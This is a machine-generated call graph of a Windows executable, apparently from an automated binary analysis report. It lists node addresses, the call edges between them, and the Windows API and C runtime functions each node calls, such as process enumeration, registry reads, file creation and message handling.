100340 8dd3a4 _wcslen 100338->100340 100339->100340 100340->99598 100342 874dc6 100341->100342 100343 874e3b 100341->100343 100350 874deb 100342->100350 100352 87f669 20 API calls _abort 100342->100352 100354 874e4d 40 API calls 4 library calls 100343->100354 100346 874e48 100346->99610 100347 874dd2 100353 882b7c 26 API calls ___std_exception_copy 100347->100353 100349 874ddd 100349->99610 100350->99610 100352->100347 100353->100349 100354->100346 100365 8be723 100355->100365 100357 8bdd9b CloseHandle 100357->99679 100358 8bdce9 Process32NextW 100358->100357 100364 8bdce2 100358->100364 100359 85bf07 8 API calls 100359->100364 100360 85b25f 8 API calls 100360->100364 100361 85694e 8 API calls 100361->100364 100362 857af4 8 API calls 100362->100364 100363 86e2e5 41 API calls 100363->100364 100364->100357 100364->100358 100364->100359 100364->100360 100364->100361 100364->100362 100364->100363 100369 8be72e 100365->100369 100366 8be745 100372 87668b 39 API calls _strftime 100366->100372 100369->100366 100370 8be74b 100369->100370 100371 876742 GetStringTypeW _strftime 100369->100371 100370->100364 100371->100369 100372->100370 100374 85bf07 8 API calls 100373->100374 100375 8b9b6d 100374->100375 100376 857a14 8 API calls 100375->100376 100377 8b9b81 100376->100377 100378 8b96e3 41 API calls 100377->100378 100384 8b9ba3 100377->100384 100380 8b9b9d 100378->100380 100382 858685 8 API calls 100380->100382 100380->100384 100381 858685 8 API calls 100381->100384 100382->100384 100383 857af4 8 API calls 100383->100384 100384->100381 100384->100383 100385 8b9c42 100384->100385 100388 8b9c26 100384->100388 100392 8b96e3 100384->100392 100386 85be6d 8 API calls 100385->100386 100387 8b9c51 100385->100387 100386->100387 100387->99711 100389 858685 8 API calls 100388->100389 100390 8b9c36 100389->100390 100391 857af4 8 API calls 100390->100391 100391->100385 100393 8b9703 _wcslen 100392->100393 100394 8b97f2 100393->100394 100396 8b9738 100393->100396 100398 8b97f7 100393->100398 100394->100384 100395 86e2e5 41 API calls 100395->100396 100396->100394 100396->100395 100397 86e2e5 41 API calls 100397->100398 100398->100394 100398->100397 100400 858e70 52 API calls 100399->100400 100401 8d88ed 100400->100401 100425 8d8932 ISource 100401->100425 100437 8d9632 100401->100437 100403 8d8bde 100404 8d8dac 100403->100404 100409 8d8bec 100403->100409 100505 8d9843 59 API calls 100404->100505 100407 8d8dbb 100407->100409 100410 8d8dc7 100407->100410 100408 858e70 52 API calls 100427 8d89a6 100408->100427 100450 8d87e3 100409->100450 100410->100425 100415 8d8c25 100464 870000 100415->100464 100418 8d8c5f 100468 857d51 100418->100468 100419 8d8c45 100503 8c3ef6 81 API calls __wsopen_s 100419->100503 100422 8d8c50 GetCurrentProcess TerminateProcess 100422->100418 100425->99722 100427->100403 100427->100408 100427->100425 100501 8b4a0c 8 API calls __fread_nolock 100427->100501 100502 8d8e7c 41 API calls _strftime 100427->100502 100428 8d8e22 100428->100425 100433 8d8e36 FreeLibrary 100428->100433 100429 861c50 8 API calls 100430 8d8c9e 100429->100430 100431 8d94da 74 API calls 100430->100431 100435 8d8caf 100431->100435 100433->100425 100435->100428 100479 861c50 100435->100479 100490 8d94da 100435->100490 100504 85b3fe 8 API calls 100435->100504 100438 85c269 8 API calls 100437->100438 100439 8d964d CharLowerBuffW 100438->100439 100440 8b96e3 41 API calls 100439->100440 100441 8d966e 100440->100441 100443 85bf07 8 API calls 100441->100443 100449 8d96a7 _wcslen 100441->100449 100444 8d9689 100443->100444 100445 858685 8 API calls 100444->100445 100446 8d969d 100445->100446 100447 8596d9 8 API calls 100446->100447 100447->100449 100448 8d97bd _wcslen 100448->100427 100449->100448 100506 8d8e7c 41 API calls _strftime 100449->100506 100451 8d8849 100450->100451 100452 8d87fe 100450->100452 100456 8d99f5 100451->100456 100453 87019b 8 API calls 100452->100453 100454 8d8820 100453->100454 100454->100451 100455 87016b 8 API calls 100454->100455 100455->100454 100457 8d9c0a ISource 100456->100457 100462 8d9a19 _strcat _wcslen ___std_exception_copy 100456->100462 100457->100415 100458 85c92d 39 API calls 100458->100462 100459 85c5df 39 API calls 100459->100462 100460 85c9fb 39 API calls 100460->100462 100461 858e70 52 API calls 100461->100462 100462->100457 100462->100458 100462->100459 100462->100460 100462->100461 100507 8bf7da 10 API calls _wcslen 100462->100507 100465 870015 100464->100465 100466 8700ad TerminateProcess 100465->100466 100467 87007b 100465->100467 100466->100467 100467->100418 100467->100419 100469 857d59 100468->100469 100470 87016b 8 API calls 100469->100470 100471 857d67 100470->100471 100508 858386 100471->100508 100474 8583b0 100511 85c700 100474->100511 100476 87019b 8 API calls 100478 85845c 100476->100478 100477 8583c0 100477->100476 100477->100478 100478->100429 100478->100435 100480 861c62 100479->100480 100482 861d20 100480->100482 100484 861c6b 100480->100484 100519 86b71c 8 API calls 100480->100519 100482->100435 100483 87016b 8 API calls 100485 861d89 100483->100485 100484->100482 100484->100483 100486 87016b 8 API calls 100485->100486 100487 861d92 100486->100487 100488 85b25f 8 API calls 100487->100488 100489 861da1 100488->100489 100489->100435 100491 8d94f2 100490->100491 100500 8d950e 100490->100500 100492 8d94f9 100491->100492 100493 8d951a 100491->100493 100494 8d95c3 100491->100494 100491->100500 100520 8bf3fd 10 API calls _strlen 100492->100520 100497 856ab6 8 API calls 100493->100497 100521 8c15b3 72 API calls ISource 100494->100521 100497->100500 100498 8d9503 100499 856ab6 8 API calls 100498->100499 100499->100500 100500->100435 100501->100427 100502->100427 100503->100422 100504->100435 100505->100407 100506->100448 100507->100462 100509 87016b 8 API calls 100508->100509 100510 857d6f 100509->100510 100510->100474 100512 85c70b 100511->100512 100513 8a1228 100512->100513 100518 85c713 ISource 100512->100518 100514 87016b 8 API calls 100513->100514 100516 8a1234 100514->100516 100515 85c71a 100515->100477 100517 85c780 8 API calls 100517->100518 100518->100515 100518->100517 100519->100484 100520->100498 100521->100500 100522 8615af 100529 86e34f 100522->100529 100524 8615c5 100538 86e3b3 100524->100538 100526 8615ef 100550 8c3ef6 81 API calls __wsopen_s 100526->100550 100528 8a61ab 100530 86e370 100529->100530 100531 86e35d 100529->100531 100533 86e375 100530->100533 100534 86e3a3 100530->100534 100551 85b3fe 8 API calls 100531->100551 100535 87016b 8 API calls 100533->100535 100552 85b3fe 8 API calls 100534->100552 100537 86e367 100535->100537 100537->100524 100539 857a14 8 API calls 100538->100539 100540 86e3ea 100539->100540 100541 85b25f 8 API calls 100540->100541 100542 86e41b 100540->100542 100543 8ae4e4 100541->100543 100542->100526 100544 857af4 8 API calls 100543->100544 100545 8ae4ef 100544->100545 100553 86e73b 39 API calls 100545->100553 100547 8ae502 100549 8ae506 100547->100549 100554 85b3fe 8 API calls 100547->100554 100549->100549 100550->100528 100551->100537 100552->100537 100553->100547 100554->100549 100555 86230c 100556 862315 __fread_nolock 100555->100556 100557 858e70 52 API calls 100556->100557 100558 8a7487 100556->100558 100559 861fa7 __fread_nolock 100556->100559 100562 862366 100556->100562 100563 87016b 8 API calls 100556->100563 100566 87019b 8 API calls 100556->100566 100557->100556 100567 85662b 8 API calls __fread_nolock 100558->100567 100561 8a7493 100561->100559 100565 85be6d 8 API calls 100561->100565 100564 857cb3 8 API calls 100562->100564 100563->100556 100564->100559 100565->100559 100566->100556 100567->100561 100568 8927a2 100571 852a52 100568->100571 100572 852a91 mciSendStringW 100571->100572 100573 8939f4 DestroyWindow 100571->100573 100574 852aad 100572->100574 100575 852d08 100572->100575 100578 893a00 100573->100578 100576 852abb 100574->100576 100574->100578 100575->100574 100577 852d17 UnregisterHotKey 100575->100577 100603 852e70 100576->100603 100577->100575 100580 893a1e FindClose 100578->100580 100582 893a45 100578->100582 100583 857953 CloseHandle 100578->100583 100580->100578 100585 893a58 FreeLibrary 100582->100585 100586 893a69 100582->100586 100583->100578 100584 852ad0 100584->100586 100589 852ade 100584->100589 100585->100582 100587 893a7d VirtualFree 100586->100587 100592 852b4b 100586->100592 100587->100586 100588 852b3a CoUninitialize 100588->100592 100589->100588 100590 893ac5 100595 893ad4 ISource 100590->100595 100609 8c3c45 6 API calls ISource 100590->100609 100592->100590 100593 852b56 100592->100593 100607 852f86 VirtualFreeEx CloseHandle 100593->100607 100599 893b63 100595->100599 100610 8b6d63 8 API calls ISource 100595->100610 100597 852b7c 100597->100595 100598 852c61 100597->100598 100598->100599 100600 852caf 100598->100600 100599->100599 100600->100599 100608 852eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 100600->100608 100602 852d03 100604 852e7d 100603->100604 100605 852ac2 100604->100605 100611 8b78b9 8 API calls 100604->100611 100605->100582 100605->100584 100607->100597 100608->100602 100609->100590 100610->100595 100611->100604 100612 87078b 100613 870797 ___DestructExceptionObject 100612->100613 100642 870241 100613->100642 100615 8708f1 100683 870bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 100615->100683 100616 87079e 100616->100615 100619 8707c8 100616->100619 100618 8708f8 100676 8751e2 100618->100676 100629 870807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 100619->100629 100653 88280d 100619->100653 100626 8707e7 100628 870868 100661 870ce9 100628->100661 100629->100628 100679 8751aa 38 API calls 2 library calls 100629->100679 100631 87086e 100665 8532a2 100631->100665 100636 87088a 100636->100618 100637 87088e 100636->100637 100638 870897 100637->100638 100681 875185 28 API calls _abort 100637->100681 100682 8703d0 13 API calls 2 library calls 100638->100682 100641 87089f 100641->100626 100643 87024a 100642->100643 100685 870a28 IsProcessorFeaturePresent 100643->100685 100645 870256 100686 873024 10 API calls 3 library calls 100645->100686 100647 87025b 100652 87025f 100647->100652 100687 8826a7 100647->100687 100650 870276 100650->100616 100652->100616 100654 882824 100653->100654 100655 870e1c CatchGuardHandler 5 API calls 100654->100655 100656 8707e1 100655->100656 100656->100626 100657 8827b1 100656->100657 100658 8827e0 100657->100658 100659 870e1c CatchGuardHandler 5 API calls 100658->100659 100660 882809 100659->100660 100660->100629 100762 8726d0 100661->100762 100664 870d0f 100664->100631 100666 853309 100665->100666 100667 8532ae IsThemeActive 100665->100667 100680 870d22 GetModuleHandleW 100666->100680 100764 8752d3 100667->100764 100669 8532d9 100770 875339 100669->100770 100671 8532e0 100777 85326d SystemParametersInfoW SystemParametersInfoW 100671->100777 100673 8532e7 100778 853312 100673->100778 101656 874f5f 100676->101656 100679->100628 100680->100636 100681->100638 100682->100641 100683->100618 100685->100645 100686->100647 100691 88d596 100687->100691 100690 87304d 8 API calls 3 library calls 100690->100652 100694 88d5b3 100691->100694 100695 88d5af 100691->100695 100693 870268 100693->100650 100693->100690 100694->100695 100697 884f8b 100694->100697 100709 870e1c 100695->100709 100698 884f97 ___DestructExceptionObject 100697->100698 100716 8832ee EnterCriticalSection 100698->100716 100700 884f9e 100717 88543f 100700->100717 100702 884fad 100708 884fbc 100702->100708 100730 884e1f 29 API calls 100702->100730 100705 884fb7 100731 884ed5 GetStdHandle GetFileType 100705->100731 100707 884fcd __wsopen_s 100707->100694 100732 884fd8 LeaveCriticalSection _abort 100708->100732 100710 870e27 IsProcessorFeaturePresent 100709->100710 100711 870e25 100709->100711 100713 870fee 100710->100713 100711->100693 100761 870fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 100713->100761 100715 8710d1 100715->100693 100716->100700 100718 88544b ___DestructExceptionObject 100717->100718 100719 885458 100718->100719 100720 88546f 100718->100720 100741 87f669 20 API calls _abort 100719->100741 100733 8832ee EnterCriticalSection 100720->100733 100723 88545d 100742 882b7c 26 API calls ___std_exception_copy 100723->100742 100725 885467 __wsopen_s 100725->100702 100726 8854a7 100743 8854ce LeaveCriticalSection _abort 100726->100743 100728 88547b 100728->100726 100734 885390 100728->100734 100730->100705 100731->100708 100732->100707 100733->100728 100744 88500d 100734->100744 100736 8853af 100752 882d58 100736->100752 100738 885401 100738->100728 100740 8853a2 100740->100736 100751 883795 11 API calls 2 library calls 100740->100751 100741->100723 100742->100725 100743->100725 100749 88501a _abort 100744->100749 100745 88505a 100759 87f669 20 API calls _abort 100745->100759 100746 885045 RtlAllocateHeap 100747 885058 100746->100747 100746->100749 100747->100740 100749->100745 100749->100746 100758 87523d 7 API calls 2 library calls 100749->100758 100751->100740 100753 882d63 RtlFreeHeap 100752->100753 100757 882d8c _free 100752->100757 100754 882d78 100753->100754 100753->100757 100760 87f669 20 API calls _abort 100754->100760 100756 882d7e GetLastError 100756->100757 100757->100738 100758->100749 100759->100747 100760->100756 100761->100715 100763 870cfc GetStartupInfoW 100762->100763 100763->100664 100765 8752df ___DestructExceptionObject 100764->100765 100827 8832ee EnterCriticalSection 100765->100827 100767 8752ea pre_c_initialization 100828 87532a 100767->100828 100769 87531f __wsopen_s 100769->100669 100771 875345 100770->100771 100772 87535f 100770->100772 100771->100772 100832 87f669 20 API calls _abort 100771->100832 100772->100671 100774 87534f 100833 882b7c 26 API calls ___std_exception_copy 100774->100833 100776 87535a 100776->100671 100777->100673 100779 853322 __wsopen_s 100778->100779 100780 85bf07 8 API calls 100779->100780 100781 85332e GetCurrentDirectoryW 100780->100781 100834 854f60 100781->100834 100827->100767 100831 883336 LeaveCriticalSection 100828->100831 100830 875331 100830->100769 100831->100830 100832->100774 100833->100776 100835 85bf07 8 API calls 100834->100835 100836 854f76 100835->100836 100956 8560f5 100836->100956 100838 854f94 100839 85bceb 8 API calls 100838->100839 100840 854fa8 100839->100840 100841 85be6d 8 API calls 100840->100841 100842 854fb3 100841->100842 100970 8588e8 100842->100970 100845 85b25f 8 API calls 100846 854fcc 100845->100846 100847 85bdc1 39 API calls 100846->100847 100848 854fdc 100847->100848 100849 85b25f 8 API calls 100848->100849 100850 855002 100849->100850 100851 85bdc1 39 API calls 100850->100851 100852 855011 100851->100852 100853 85bf07 8 API calls 100852->100853 100854 85502f 100853->100854 100973 855151 100854->100973 100957 856102 __wsopen_s 100956->100957 100958 8584b7 8 API calls 100957->100958 100959 856134 100957->100959 100958->100959 100960 85627c 8 API calls 100959->100960 100968 85616a 100959->100968 100960->100959 100961 85b25f 8 API calls 100962 856261 100961->100962 100964 85684e 8 API calls 100962->100964 100963 85b25f 8 API calls 100963->100968 100966 85626d 100964->100966 100965 85627c 8 API calls 100965->100968 100966->100838 100968->100963 100968->100965 100969 856238 100968->100969 100990 85684e 100968->100990 100969->100961 100969->100966 100971 87016b 8 API calls 100970->100971 100972 854fbf 100971->100972 100972->100845 100991 85685d 100990->100991 100995 85687e __fread_nolock 100990->100995 100993 87019b 8 API calls 100991->100993 100992 87016b 8 API calls 100994 856891 100992->100994 100993->100995 100994->100968 100995->100992 101657 874f6b _abort 101656->101657 101658 874f84 101657->101658 101659 874f72 101657->101659 101680 8832ee EnterCriticalSection 101658->101680 101695 8750b9 GetModuleHandleW 101659->101695 101662 874f77 101662->101658 101696 8750fd GetModuleHandleExW 101662->101696 101663 875029 101684 875069 101663->101684 101667 875000 101672 875018 101667->101672 101673 8827b1 _abort 5 API calls 101667->101673 101669 874f8b 101669->101663 101669->101667 101681 882538 101669->101681 101670 875046 101687 875078 101670->101687 101671 875072 101704 8920c9 5 API calls CatchGuardHandler 101671->101704 101674 8827b1 _abort 5 API calls 101672->101674 101673->101672 101674->101663 101680->101669 101705 882271 101681->101705 101724 883336 LeaveCriticalSection 101684->101724 101686 875042 101686->101670 101686->101671 101725 88399c 101687->101725 101690 8750a6 101693 8750fd _abort 8 API calls 101690->101693 101691 875086 GetPEB 101691->101690 101692 875096 GetCurrentProcess TerminateProcess 101691->101692 101692->101690 101694 8750ae ExitProcess 101693->101694 101695->101662 101697 875127 GetProcAddress 101696->101697 101698 87514a 101696->101698 101701 87513c 101697->101701 101699 875150 FreeLibrary 101698->101699 101700 875159 101698->101700 101699->101700 101702 870e1c CatchGuardHandler 5 API calls 101700->101702 101701->101698 101703 874f83 101702->101703 101703->101658 101708 882220 101705->101708 101707 882295 101707->101667 101709 88222c ___DestructExceptionObject 101708->101709 101716 8832ee EnterCriticalSection 101709->101716 101711 88223a 101717 8822c1 101711->101717 101715 882258 __wsopen_s 101715->101707 101716->101711 101718 8822e1 101717->101718 101721 8822e9 101717->101721 101719 870e1c CatchGuardHandler 5 API calls 101718->101719 101720 882247 101719->101720 101723 882265 LeaveCriticalSection _abort 101720->101723 101721->101718 101722 882d58 _free 20 API calls 101721->101722 101722->101718 101723->101715 101724->101686 101726 8839c1 101725->101726 101727 8839b7 101725->101727 101732 883367 5 API calls 2 library calls 101726->101732 101729 870e1c CatchGuardHandler 5 API calls 101727->101729 101730 875082 101729->101730 101730->101690 101730->101691 101731 8839d8 101731->101727 101732->101731 101733 8ae5f8 GetUserNameW 101734 8ae610 101733->101734 101735 8a7e9e 101736 862e53 ISource 101735->101736 101738 862edd 101736->101738 101739 86e29c 8 API calls ISource 101736->101739 101739->101736 101740 85f470 101743 869fa5 101740->101743 101742 85f47c 101744 869fc6 101743->101744 101745 86a023 101743->101745 101744->101745 101747 8602f0 253 API calls 101744->101747 101749 86a067 101745->101749 101752 8c3ef6 81 API calls __wsopen_s 101745->101752 101750 869ff7 101747->101750 101748 8a800f 101748->101748 101749->101742 101750->101745 101750->101749 101751 85be6d 8 API calls 101750->101751 101751->101745 101752->101748 101753 8794d1 101763 87e048 101753->101763 101757 8794de 101758 88510a 20 API calls 101757->101758 101759 8794ed DeleteCriticalSection 101758->101759 101759->101757 101760 879508 101759->101760 101761 882d58 _free 20 API calls 101760->101761 101762 879513 101761->101762 101776 87e051 101763->101776 101765 8794d9 101766 88506a 101765->101766 101767 885076 ___DestructExceptionObject 101766->101767 101793 8832ee EnterCriticalSection 101767->101793 101769 885081 101770 8850ec 101769->101770 101772 8850c0 DeleteCriticalSection 101769->101772 101773 87ea08 67 API calls 101769->101773 101794 885101 101770->101794 101774 882d58 _free 20 API calls 101772->101774 101773->101769 101774->101769 101775 8850f8 __wsopen_s 101775->101757 101777 87e05d ___DestructExceptionObject 101776->101777 101786 8832ee EnterCriticalSection 101777->101786 101779 87e100 101787 87e120 101779->101787 101782 87e10c __wsopen_s 101782->101765 101784 87e06c 101784->101779 101785 87e001 66 API calls 101784->101785 101790 87951d EnterCriticalSection 101784->101790 101791 87e0f6 LeaveCriticalSection __fread_nolock 101784->101791 101785->101784 101786->101784 101792 883336 LeaveCriticalSection 101787->101792 101789 87e127 101789->101782 101790->101784 101791->101784 101792->101789 101793->101769 101797 883336 LeaveCriticalSection 101794->101797 101796 885108 101796->101775 101797->101796 101798 851033 101803 856686 101798->101803 101802 851042 101804 85bf07 8 API calls 101803->101804 101805 8566f4 101804->101805 101811 8555cc 101805->101811 101807 856791 101808 851038 101807->101808 101814 8568e6 8 API calls __fread_nolock 101807->101814 101810 870433 29 API calls __onexit 101808->101810 101810->101802 101815 8555f8 101811->101815 101814->101807 101816 8555eb 101815->101816 101817 855605 101815->101817 101816->101807 101817->101816 101818 85560c RegOpenKeyExW 101817->101818 101818->101816 101819 855626 RegQueryValueExW 101818->101819 101820 85565c RegCloseKey 101819->101820 101821 855647 101819->101821 101820->101816 101821->101820 101822 8ae6dd 101823 8ae68a 101822->101823 101826 8be753 SHGetFolderPathW 101823->101826 101827 8584b7 8 API calls 101826->101827 101828 8ae693 101827->101828 101829 86f9b1 101830 86f9dc 101829->101830 101831 86f9bb 101829->101831 101837 8afadc 101830->101837 101838 8b55d9 8 API calls ISource 101830->101838 101832 85c34b 8 API calls 101831->101832 101833 86f9cb 101832->101833 101835 85c34b 8 API calls 101833->101835 101836 86f9db 101835->101836 101838->101830 101839 85367c 101842 853696 101839->101842 101843 8536ad 101842->101843 101844 853711 101843->101844 101845 8536b2 101843->101845 101883 85370f 101843->101883 101847 853717 101844->101847 101848 893dce 101844->101848 101849 8536bf 101845->101849 101850 85378b PostQuitMessage 101845->101850 101846 8536f6 DefWindowProcW 101870 853690 101846->101870 101851 853743 SetTimer RegisterWindowMessageW 101847->101851 101852 85371e 101847->101852 101898 852f24 10 API calls 101848->101898 101853 893e3b 101849->101853 101854 8536ca 101849->101854 101850->101870 101858 85376c CreatePopupMenu 101851->101858 101851->101870 101856 853727 KillTimer 101852->101856 101857 893d6f 101852->101857 101903 8bc80c 65 API calls ___scrt_fastfail 101853->101903 101859 853795 101854->101859 101860 8536d4 101854->101860 101894 85388e Shell_NotifyIconW ___scrt_fastfail 101856->101894 101865 893daa MoveWindow 101857->101865 101866 893d74 101857->101866 101858->101870 101887 86fcbb 101859->101887 101868 8536df 101860->101868 101874 893e20 101860->101874 101862 893def 101899 86f1c6 40 API calls 101862->101899 101865->101870 101871 893d99 SetFocus 101866->101871 101872 893d7a 101866->101872 101875 853779 101868->101875 101876 8536ea 101868->101876 101869 893e4d 101869->101846 101869->101870 101871->101870 101872->101876 101877 893d83 101872->101877 101873 85373a 101895 85572c DeleteObject DestroyWindow 101873->101895 101874->101846 101902 8b1367 8 API calls 101874->101902 101896 8537a6 75 API calls ___scrt_fastfail 101875->101896 101876->101846 101900 85388e Shell_NotifyIconW ___scrt_fastfail 101876->101900 101897 852f24 10 API calls 101877->101897 101881 853789 101881->101870 101883->101846 101885 893e14 101901 8538f2 60 API calls ___scrt_fastfail 101885->101901 101888 86fd59 101887->101888 101889 86fcd3 ___scrt_fastfail 101887->101889 101888->101870 101904 855f59 101889->101904 101891 86fd42 KillTimer SetTimer 101891->101888 101892 86fcfa 101892->101891 101893 8afdcb Shell_NotifyIconW 101892->101893 101893->101891 101894->101873 101895->101870 101896->101881 101897->101870 101898->101862 101899->101876 101900->101885 101901->101883 101902->101883 101903->101869 101905 855f76 101904->101905 101906 856058 101904->101906 101907 857a14 8 API calls 101905->101907 101906->101892 101908 855f84 101907->101908 101909 855f91 101908->101909 101910 895101 LoadStringW 101908->101910 101911 8584b7 8 API calls 101909->101911 101913 89511b 101910->101913 101912 855fa6 101911->101912 101914 855fb3 101912->101914 101921 895137 101912->101921 101916 85be6d 8 API calls 101913->101916 101919 855fd9 ___scrt_fastfail 101913->101919 101914->101913 101915 855fbd 101914->101915 101917 8565a4 8 API calls 101915->101917 101916->101919 101918 855fcb 101917->101918 101920 857af4 8 API calls 101918->101920 101923 85603e Shell_NotifyIconW 101919->101923 101920->101919 101921->101919 101922 89517a 101921->101922 101924 85bf07 8 API calls 101921->101924 101935 86fe8f 51 API calls 101922->101935 101923->101906 101925 895161 101924->101925 101934 8ba265 9 API calls 101925->101934 101928 89516c 101930 857af4 8 API calls 101928->101930 101929 895199 101931 8565a4 8 API calls 101929->101931 101930->101922 101932 8951aa 101931->101932 101933 8565a4 8 API calls 101932->101933 101933->101919 101934->101928 101935->101929 101936 8a3fb3 101952 85ee60 ISource 101936->101952 101937 85f1c1 PeekMessageW 101937->101952 101938 85eeb7 GetInputState 101938->101937 101938->101952 101940 8a3271 TranslateAcceleratorW 101940->101952 101941 85f0b4 timeGetTime 101941->101952 101942 85f223 TranslateMessage DispatchMessageW 101943 85f23f PeekMessageW 101942->101943 101943->101952 101944 85f25f Sleep 101944->101952 101945 8a4127 Sleep 101959 8a4004 101945->101959 101947 8a338d timeGetTime 102004 86a9e5 9 API calls 101947->102004 101949 8bdc9c 46 API calls 101949->101959 101951 8a41be GetExitCodeProcess 101954 8a41ea CloseHandle 101951->101954 101955 8a41d4 WaitForSingleObject 101951->101955 101952->101937 101952->101938 101952->101940 101952->101941 101952->101942 101952->101943 101952->101944 101952->101945 101952->101947 101957 85f085 101952->101957 101952->101959 101964 8602f0 253 API calls 101952->101964 101966 862ad0 253 API calls 101952->101966 101968 85f400 101952->101968 101975 85f680 101952->101975 101998 86f2a5 101952->101998 102003 86f27e timeGetTime 101952->102003 102005 8c4384 8 API calls 101952->102005 102006 8c3ef6 81 API calls __wsopen_s 101952->102006 101953 8e331e GetForegroundWindow 101953->101959 101954->101959 101955->101952 101955->101954 101958 8a3cf5 101958->101957 101959->101949 101959->101951 101959->101952 101959->101953 101959->101958 101960 8a425c Sleep 101959->101960 102007 8d5fb5 8 API calls 101959->102007 102008 8bf1a7 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101959->102008 102009 86f27e timeGetTime 101959->102009 101960->101952 101964->101952 101966->101952 101969 85f41f 101968->101969 101970 85f433 101968->101970 102010 85e910 101969->102010 102043 8c3ef6 81 API calls __wsopen_s 101970->102043 101972 85f42a 101972->101952 101974 8a4528 101974->101974 101977 85f6c0 101975->101977 101976 8602f0 253 API calls 101993 85f78c ISource 101976->101993 101977->101993 102052 8705d2 5 API calls __Init_thread_wait 101977->102052 101980 8a457d 101982 85bf07 8 API calls 101980->101982 101980->101993 101981 85bf07 8 API calls 101981->101993 101983 8a4597 101982->101983 102053 870433 29 API calls __onexit 101983->102053 101984 85bdc1 39 API calls 101984->101993 101987 8a45a1 102054 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 101987->102054 101990 8c3ef6 81 API calls 101990->101993 101992 85be6d 8 API calls 101992->101993 101993->101976 101993->101981 101993->101984 101993->101990 101993->101992 101994 85fa91 101993->101994 101995 861c50 8 API calls 101993->101995 102051 86b2d6 253 API calls 101993->102051 102055 8705d2 5 API calls __Init_thread_wait 101993->102055 102056 870433 29 API calls __onexit 101993->102056 102057 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 101993->102057 102058 8d5131 101 API calls 101993->102058 102059 8d721e 253 API calls 101993->102059 101994->101952 101995->101993 102000 86f2b8 101998->102000 102001 86f2c1 101998->102001 101999 86f2e5 IsDialogMessageW 101999->102000 101999->102001 102000->101952 102001->101999 102001->102000 102002 8af83b GetClassLongW 102001->102002 102002->101999 102002->102001 102003->101952 102004->101952 102005->101952 102006->101952 102007->101959 102008->101959 102009->101959 102011 85e92b 102010->102011 102012 8602f0 253 API calls 102011->102012 102013 85e94d 102012->102013 102014 85e9bb ISource 102013->102014 102015 8a3176 102013->102015 102017 85ed85 102013->102017 102018 85ea73 102013->102018 102024 85eb68 102013->102024 102027 87016b 8 API calls 102013->102027 102038 85ead9 ISource __fread_nolock 102013->102038 102014->101972 102050 8c3ef6 81 API calls __wsopen_s 102015->102050 102017->102014 102028 87019b 8 API calls 102017->102028 102018->102017 102019 85ea7e 102018->102019 102021 87016b 8 API calls 102019->102021 102020 85ecaf 102022 85ecc4 102020->102022 102023 8a3167 102020->102023 102031 85ea85 __fread_nolock 102021->102031 102025 87016b 8 API calls 102022->102025 102049 8d6062 8 API calls 102023->102049 102029 87019b 8 API calls 102024->102029 102035 85eb1a 102025->102035 102027->102013 102028->102031 102029->102038 102030 87016b 8 API calls 102032 85eaa6 102030->102032 102031->102030 102031->102032 102032->102038 102044 85d210 253 API calls 102032->102044 102034 8a3156 102048 8c3ef6 81 API calls __wsopen_s 102034->102048 102035->101972 102038->102020 102038->102034 102038->102035 102039 8a3131 102038->102039 102041 8a310f 102038->102041 102045 854485 253 API calls 102038->102045 102047 8c3ef6 81 API calls __wsopen_s 102039->102047 102046 8c3ef6 81 API calls __wsopen_s 102041->102046 102043->101974 102044->102038 102045->102038 102046->102035 102047->102035 102048->102035 102049->102015 102050->102014 102051->101993 102052->101980 102053->101987 102054->101993 102055->101993 102056->101993 102057->101993 102058->101993 102059->101993 102060 888792 102061 8887a8 102060->102061 102062 8887ba 102061->102062 102064 890d24 102061->102064 102067 890421 102064->102067 102066 890d3f 102066->102062 102068 89042d ___DestructExceptionObject 102067->102068 102069 89043b 102068->102069 102072 890474 102068->102072 102125 87f669 20 API calls _abort 102069->102125 102071 890440 102126 882b7c 26 API calls ___std_exception_copy 102071->102126 102078 8909fb 102072->102078 102077 89044a __wsopen_s 102077->102066 102128 8907cf 102078->102128 102081 890a2d 102160 87f656 20 API calls _abort 102081->102160 102082 890a46 102146 8855b1 102082->102146 102085 890a4b 102086 890a6b 102085->102086 102087 890a54 102085->102087 102159 89073a CreateFileW 102086->102159 102162 87f656 20 API calls _abort 102087->102162 102091 890a59 102163 87f669 20 API calls _abort 102091->102163 102093 890b21 GetFileType 102096 890b2c GetLastError 102093->102096 102097 890b73 102093->102097 102094 890aa4 102094->102093 102099 890af6 GetLastError 102094->102099 102164 89073a CreateFileW 102094->102164 102095 890498 102127 8904c1 LeaveCriticalSection __wsopen_s 102095->102127 102166 87f633 20 API calls 2 library calls 102096->102166 102168 8854fa 21 API calls 3 library calls 102097->102168 102098 890a32 102161 87f669 20 API calls _abort 102098->102161 102165 87f633 20 API calls 2 library calls 102099->102165 102102 890b3a CloseHandle 102102->102098 102104 890b63 102102->102104 102167 87f669 20 API calls _abort 102104->102167 102106 890ae9 102106->102093 102106->102099 102108 890b94 102110 890be0 102108->102110 102169 89094b 72 API calls 4 library calls 102108->102169 102109 890b68 102109->102098 102114 890c0d 102110->102114 102170 8904ed 72 API calls 4 library calls 102110->102170 102113 890c06 102113->102114 102115 890c1e 102113->102115 102171 888a3e 102114->102171 102115->102095 102117 890c9c CloseHandle 102115->102117 102186 89073a CreateFileW 102117->102186 102119 890cc7 102120 890cd1 GetLastError 102119->102120 102121 890cfd 102119->102121 102187 87f633 20 API calls 2 library calls 102120->102187 102121->102095 102123 890cdd 102188 8856c3 21 API calls 3 library calls 102123->102188 102125->102071 102126->102077 102127->102077 102129 8907f0 102128->102129 102130 89080a 102128->102130 102129->102130 102196 87f669 20 API calls _abort 102129->102196 102189 89075f 102130->102189 102133 8907ff 102197 882b7c 26 API calls ___std_exception_copy 102133->102197 102135 890842 102136 890871 102135->102136 102198 87f669 20 API calls _abort 102135->102198 102144 8908c4 102136->102144 102200 87da9d 26 API calls 2 library calls 102136->102200 102139 890866 102199 882b7c 26 API calls ___std_exception_copy 102139->102199 102140 8908bf 102141 89093e 102140->102141 102140->102144 102201 882b8c 11 API calls _abort 102141->102201 102144->102081 102144->102082 102145 89094a 102147 8855bd ___DestructExceptionObject 102146->102147 102204 8832ee EnterCriticalSection 